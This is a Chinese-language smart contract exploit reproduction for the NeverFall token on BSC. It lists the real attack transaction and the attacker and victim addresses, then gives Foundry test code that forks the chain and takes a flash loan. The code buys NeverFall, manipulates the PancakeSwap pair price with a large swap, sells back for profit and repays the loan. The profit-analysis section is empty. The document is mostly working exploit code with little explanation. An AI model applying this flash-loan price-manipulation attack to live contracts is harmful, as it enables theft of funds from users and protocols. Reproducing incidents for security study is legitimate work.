智能合约漏洞案例,NeverFall 漏洞复现
1. 漏洞简介
https://twitter.com/BeosinAlert/status/1653619782317662211
2. 相关地址或交易
https://explorer.phalcon.xyz/tx/bsc/0xccf513fa8a8ed762487a0dcfa54aa65c74285de1bc517bd68dbafa2813e4b7cb 攻击交易
攻击账号:0x53b757db8b9f3375d71eafe53e411a16acde75ee
攻击合约:0x35353ec557b9e23137ae27e9d4cc829d4dace16b
受害合约:0x5abde8b434133c98c36f4b21476791d95d888bf5
3. 获利分析
5. 漏洞复现
漏洞复现代码:
// SPDX-License-Identifier: LGPL-3.0-only
pragma solidity ^0.8.10;
//import "../interfaces/interface.sol";
import "forge-std/Test.sol";
import "./interface.sol";
import "../contracts/ERC20.sol";
interface NeverFall {
function buy(uint256 amountU) external returns(uint256);
function sell(uint256 amount) external returns(uint256);
}
contract ContractTest is Test{
address constant flashloan = 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00;
address constant bscusd = 0x55d398326f99059fF775485246999027B3197955;
address constant neverfall = 0x5ABDe8B434133C98c36F4B21476791D95D888bF5;
address payable PancakeSwapRouterv2 = payable(0x10ED43C718714eb63d5aA57B78B54704E256024E);
address PancakeSwapV2 = 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 27863178 -2);
//uint256 forkId = cheats.createFork("bsc");
//cheats.selectFork(forkId);
cheats.label(address(flashloan), "flashloan");
cheats.label(address(bscusd), "bscusd");
cheats.label(address(neverfall), "NeverFall");
}
function testExploit() external {
IPancakePair(flashloan).swap(1600000 * 1e18,0,address(this),new bytes(1));
}
function pancakeCall(address sender, uint amount0, uint amount1, bytes calldata data) external {
uint256 loanNum = IERC20(bscusd).balanceOf(address(this));
console.log(" loanNum is : %s ", loanNum);
IERC20(bscusd).approve(neverfall,type(uint256).max);
IERC20(bscusd).approve(PancakeSwapRouterv2,type(uint256).max);
uint256 buyNum = NeverFall(neverfall).buy(200000* 1e18);
console.log(" buyNum is : %s ", buyNum);
address [] memory path = new address[](2);
path[0] = bscusd;
path[1] = neverfall;
IPancakeRouter(PancakeSwapRouterv2).swapExactTokensForTokensSupportingFeeOnTransferTokens(1400000* 1e18,1,path,0x051d6a5f987e4fc53B458eC4f88A104356E6995a,88888899999);
emit log_named_decimal_uint("pair USDT balance after swap",IERC20(bscusd).balanceOf(PancakeSwapV2),18);
emit log_named_decimal_uint("pair neverfall balance after swap",IERC20(neverfall).balanceOf(PancakeSwapV2),18);
uint256 sellNum = NeverFall(neverfall).sell(75500000 * 1e18);
console.log(" sellNum is : %s ", sellNum);
IERC20(bscusd).transfer(flashloan,1600000 * 1e18 * 1.003);
emit log_named_decimal_uint("Attacker USDT balance after exploit",IERC20(bscusd).balanceOf(address(this)),18);
emit log_named_decimal_uint("Attacker neverfallToken balance after exploit", IERC20(neverfall).balanceOf(address(this)),18);
/*
uint256 earnNum = IERC20(bscusd).balanceOf(address(this));
console.log(" earnNum is : %s ", earnNum);
uint256 neverfallNum = IERC20(neverfall).balanceOf(address(this));
console.log(" neverfallNum is : %s ", neverfallNum);
*/
}
}